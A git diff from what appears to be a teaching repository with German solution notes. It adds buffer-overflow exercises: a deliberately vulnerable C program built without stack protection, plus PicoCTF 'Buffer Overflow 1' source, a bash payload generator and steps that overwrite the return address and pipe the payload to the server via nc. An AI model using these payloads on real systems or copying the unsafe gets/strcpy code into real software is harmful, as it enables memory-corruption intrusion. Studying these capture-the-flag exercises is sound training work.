Examples and stuff

assets/logic/.gitignore

@@ -0,0 +1 @@
+logic

assets/logic/Makefile

@@ -0,0 +1,16 @@
+# use bash so process substutution is available
+CC = gcc
+CFLAGS = -fno-stack-protector -g
+SHELL = bash
+SRC = logic.c
+TARGET = $(SRC:%.c=%)
+
+.PHONY: build
+build: $(TARGET)
+
+%: %.c
+	$(CC) ${CFLAGS} $< -o $@
+
+.PHONY: clean
+clean:
+	rm -f logic

assets/logic/logic.c

@@ -3,7 +3,7 @@
 
 void foo(char *input) {
   int is_logged_in = 0;
-  char buf[50];
+  char buf[64];
   strcpy(buf, input);
   if (is_logged_in) {
     puts("logged in!!1!");
@@ -13,5 +13,9 @@ void foo(char *input) {
 }
 
 int main(int argc, char **argv) {
+  if (argc != 2) {
+    return 1;
+  }
   foo(argv[1]);
+  return 0;
 }

assets/logic/solution.md

@@ -0,0 +1,8 @@
+# Beispiel 1
+
+ * Debugger `gdb`
+ * `list` für Code
+ * `break <n>` für Breakpoint
+ * `run $(python -c 'print("A"*77)')`
+ * `show is_logged_in`
+ * `continue`

assets/picoctf/buffer_overflow_1/.gitignore

@@ -0,0 +1 @@
+payload

assets/picoctf/buffer_overflow_1/payload.sh

@@ -0,0 +1,17 @@
+#!/usr/bin/env bash
+
+function repeat() {
+  n="${1}"
+  string="${2}"
+  printf "%${n}s" | tr " " "${string}"
+}
+
+function main() {
+  buffer_size="${1}"
+  address="${2}"
+  filler="$(repeat "${buffer_size}" A)"
+  newline="\n"
+  printf "%s%b%b" "${filler}" "${address}" "${newline}"
+}
+
+main "${@}"

assets/picoctf/buffer_overflow_1/solution.md

@@ -0,0 +1,10 @@
+# PicoCTF - Buffer Overflow 1
+
+https://play.picoctf.org/practice/challenge/258?category=6&page=1
+
+ * Buffergröße bestimmen
+ * Return Adresse überschreiben
+ * Adresse der Zielfunktion finden `nm -g -C vuln`
+ * Little Endian!
+ * `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...`
+ * `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'`

assets/picoctf/buffer_overflow_1/vuln.c

@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+
+  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+